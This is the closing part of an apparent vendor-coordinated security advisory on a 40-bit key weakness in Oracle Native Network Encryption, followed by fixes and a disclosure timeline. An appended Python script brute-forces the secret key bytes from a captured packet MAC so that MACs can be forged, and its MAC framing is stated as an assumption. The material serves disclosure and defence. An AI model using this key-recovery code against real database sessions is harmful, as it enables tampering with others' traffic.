<br /><br />from Crypto.Cipher import AES   # pycryptodome<br /><br />class NNEKeyGenerator:<br />    def __init__(self, SK, IV):<br />        # Master key: only the first 5 bytes (40 bits) of the session key are used;<br />        # the remaining 11 bytes are the constants FF 00 .. 00<br />        mk = SK[0:5] + b'\xFF' + b'\x00' * 10<br />        self.m = AES.new(mk, AES.MODE_CBC, iv=IV[0:16])<br />        self.ms = b'\x00'*32<br />        self.ms = s = self.m.encrypt(self.ms)<br />        self.m = AES.new(s[0:16], AES.MODE_CBC, iv=s[16:32])<br /><br />        # server-to-client direction<br />        k1 = s[0:5] + b'\xB4' + s[6:16]<br />        self.s2c = AES.new(k1, AES.MODE_CBC, iv=s[16:32])<br />        self.s2cs = b'\x00' * 32<br /><br />        # client-to-server direction<br />        k2 = s[0:5] + b'\x5A' + s[6:16]<br />        self.c2s = AES.new(k2, AES.MODE_CBC, iv=s[16:32])<br />        self.c2ss = b'\x00' * 32<br /><br /><br />A per-packet key "k" (here for the client-to-server direction) is then generated like<br /><br />    def next_c2s_key(self):<br />        # the CBC object keeps its chaining state, so every call yields a fresh 32-byte key<br />        self.c2ss = k = self.c2s.encrypt(self.c2ss)<br />        return k<br /><br />and appended to the packet data as well as hashed using the selected hash algorithm.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Update the Oracle Database servers and clients to the patched versions.<br />Enforce usage of a secured protocol version by setting the following options:<br /><br /> SQLNET.ALLOW_WEAK_CRYPTO_CLIENTS=FALSE (server-side)<br /> SQLNET.ALLOW_WEAK_CRYPTO=FALSE (client-side)<br /><br /><br />Or use TLS-based transport security instead of Native Network Encryption.<br /><br /><br />More information:<br />https://www.oracle.com/security-alerts/cpujul2021.html<br />https://support.oracle.com/rs?type=doc&id=2791571.1 (customer account required)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2021-03-02: Vulnerability discovered<br />2021-03-17: Vulnerability reported to manufacturer<br />2021-07-20: Initial patch release by manufacturer<br />2021-08-07: Final patches released by manufacturer<br />2021-12-10: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Oracle Database<br /> https://www.oracle.com/database/<br />[2] SySS Security Advisory SYSS-2021-062 <br /> 
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-062.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Paper "Oracle Native Network Encryption" <br /> https://www.syss.de/fileadmin/dokumente/Publikationen/2021/2021_Oracle_NNE.pdf<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Bechler of SySS GmbH.<br /><br />E-Mail: moritz.bechler@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc<br />Key ID: 0x768EFE2BB3E53DDA<br />Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /><br /></code></pre>
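<p>What the 40-bit truncation in the advisory's PoC means in practice, as an added example that is not part of the SySS advisory or its paper: the key-generator initialisation is re-implemented with a stateless AES-CBC helper (the <code>cryptography</code> package, or pycryptodome as used in the PoC), and an attacker who knows the clear-text IV and has captured one packet with its MAC tries candidate values for the five secret session-key bytes until the derivation reproduces that MAC. The advisory describes the MAC as the per-packet key k appended to the packet data and hashed; the exact framing and hash are in the SySS paper, so <code>packet_mac</code> models it as SHA-256 over data||k and should be read as an assumption. The session key, IV, packet and the small search window are constructed for the demo; the real attack iterates all 2^40 candidates.</p>

```python
import hashlib
from typing import Callable, Iterable, Optional


def aes_cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-CBC without padding, via whichever library is installed."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
        return enc.update(data) + enc.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome, as in the advisory's PoC
        return AES.new(key, AES.MODE_CBC, iv=iv).encrypt(data)


def keygen_seed(sk5: bytes, iv: bytes) -> bytes:
    """First step of the PoC: the master key holds only 5 session-key bytes (40 bits);
    the other 11 bytes are the constants FF 00..00, so those 5 bytes are the whole secret."""
    mk = sk5 + b"\xff" + b"\x00" * 10
    return aes_cbc_encrypt(mk, iv[:16], b"\x00" * 32)  # the 32-byte value s


def c2s_packet_keys(sk5: bytes, iv: bytes, n: int) -> list:
    """First n client-to-server per-packet keys. The PoC's CBC object keeps its chaining
    state between calls, emulated here by feeding the last ciphertext block back as IV."""
    s = keygen_seed(sk5, iv)
    k2 = s[0:5] + b"\x5a" + s[6:16]
    state, chain_iv, keys = b"\x00" * 32, s[16:32], []
    for _ in range(n):
        state = aes_cbc_encrypt(k2, chain_iv, state)
        chain_iv = state[16:32]
        keys.append(state)
    return keys


def packet_mac(data: bytes, k: bytes, hashfn: Callable = hashlib.sha256) -> bytes:
    """MAC model (assumption): the per-packet key k appended to the data and hashed,
    as the advisory describes; the precise framing is in the SySS paper."""
    return hashfn(data + k).digest()


def recover_sk_prefix(iv: bytes, first_packet: bytes, observed_mac: bytes,
                      candidates: Iterable[int], hashfn: Callable = hashlib.sha256) -> Optional[bytes]:
    """Offline search: the attacker knows iv (sent in clear), the packet (integrity-only
    mode, so it is in clear too) and its MAC. Each candidate costs two AES-CBC runs and a hash."""
    for cand in candidates:
        sk5 = cand.to_bytes(5, "big")
        k = c2s_packet_keys(sk5, iv, 1)[0]
        if packet_mac(first_packet, k, hashfn) == observed_mac:
            return sk5
    return None


# --- constructed demo values, not from a real capture ---
DEMO_SK5 = bytes.fromhex("13579bdf24")      # the 40 secret bits
DEMO_IV = bytes(range(16))                  # IV as exchanged in clear during negotiation
DEMO_PACKET = b"SELECT * FROM employees"    # first client-to-server packet body


def demo(window: int = 200) -> Optional[bytes]:
    """Recover DEMO_SK5 from one observed MAC, searching a small window around the true
    value. The real attack walks all 2**40 candidates; nothing else about it changes."""
    observed = packet_mac(DEMO_PACKET, c2s_packet_keys(DEMO_SK5, DEMO_IV, 1)[0])
    truth = int.from_bytes(DEMO_SK5, "big")
    return recover_sk_prefix(DEMO_IV, DEMO_PACKET, observed, range(truth - window, truth + window))


if __name__ == "__main__":
    print("recovered SK[0:5] =", demo().hex(), "| full search space: 2**40 =", 2 ** 40)
```

<p>Once the five bytes are known, the attacker can regenerate every later per-packet key for both directions and forge MACs for modified commands or results, which is the manipulation the advisory warns about; the SQLNET.ALLOW_WEAK_CRYPTO settings above exist precisely to refuse sessions that negotiate this key generator.</p>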